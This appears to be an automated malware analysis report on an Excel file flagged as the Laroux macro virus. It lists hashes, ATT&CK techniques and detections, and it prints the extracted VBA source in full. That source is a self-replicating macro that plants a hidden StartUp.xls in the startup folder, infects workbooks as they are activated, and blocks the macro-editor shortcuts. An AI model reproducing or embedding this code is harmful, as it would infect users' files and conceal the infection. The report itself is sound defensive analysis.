Office (OLE) malware analysis — malicious · df0e1c3311baef65

MALICIOUS

Office (OLE)

22.0 KB Created: 1996-12-17 01:32:42 Authoring application: Microsoft Excel First seen: 2021-11-22

MD5: dcf1a44c406b1bbf307fc463a112fe53 SHA-1: 6f03fb1a4c767acf93dea21de6ae15940aa53464 SHA-256: df0e1c3311baef6572568afd6a05e704bc6e76c081a6fe7886242e47846b09b5

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The file contains a VBA macro with an Auto_Open subroutine, indicating it is designed to execute automatically upon opening. The script attempts to copy itself to the Excel startup folder as 'StartUp.xls' and sets up event handlers, suggesting an intent to establish persistence. The ClamAV detection 'Doc.Macro.Laroux-5893719-0' further supports its malicious nature.

Heuristics 3

ClamAV: Doc.Macro.Laroux-5893719-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 925 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	925 bytes
SHA-256: `09db81543d44278cb9676ed8a1a5ed70737b46a962cd0edd970849e780ee527b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "StartUp" Sub auto_open() On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then Application.ScreenUpdating = False ThisWorkbook.Sheets("StartUp").Copy ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") n$ = ActiveWorkbook.Name ActiveWindow.Visible = False Workbooks("StartUp.xls").Save 'Workbooks(n$).Close (False) End If Application.OnSheetActivate = "StartUp.xls!ycop" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnKey "%{F8}", "StartUp.xls!escape" End Sub Sub ycop() On Error Resume Next If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then Application.ScreenUpdating = ture n$ = ActiveSheet.Name Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1) End If End Sub

SHA-256: 09db81543d44278cb9676ed8a1a5ed70737b46a962cd0edd970849e780ee527b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "StartUp"

Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("StartUp.xls").Save
    'Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "StartUp.xls!ycop"
  Application.OnKey "%{F11}", "StartUp.xls!escape"
  Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub



Sub ycop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = ture
    n$ = ActiveSheet.Name
    Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    End If
    End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.